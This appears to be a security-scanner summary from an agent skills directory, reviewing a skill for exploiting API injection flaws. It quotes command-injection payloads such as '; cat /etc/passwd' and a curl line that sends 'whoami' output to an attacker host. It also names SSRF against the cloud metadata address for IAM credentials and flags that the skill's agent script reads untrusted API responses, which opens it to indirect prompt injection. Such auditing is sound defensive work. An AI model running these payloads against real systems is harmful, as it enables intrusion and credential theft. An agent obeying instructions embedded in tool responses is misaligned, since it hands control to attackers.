The Agent Skills Directory

[COMMAND_EXECUTION]: The skill provides functional OS command injection payloads in both the workflow documentation and the automation script. Examples found in SKILL.md and scripts/agent.py include ; id, | whoami, and ; cat /etc/passwd, which are used to execute arbitrary system commands on targets.
[DATA_EXFILTRATION]: The skill includes instructions and payloads for exfiltrating sensitive data to external infrastructure. SKILL.md provides a payload ; curl http://attacker-controlled-server.com/$(whoami) for transmitting host identifiers. Additionally, it contains SSRF payloads specifically targeting cloud metadata endpoints at 169.254.169.254 to extract IAM credentials and instance configuration.
[PROMPT_INJECTION]: The skill has an attack surface for indirect prompt injection. The script scripts/agent.py ingests untrusted text from API responses via resp.text without using boundary markers or sanitization. This allows an attacker-controlled API to potentially influence the agent's behavior by embedding instructions in the response body.

exploiting-api-injection-vulnerabilities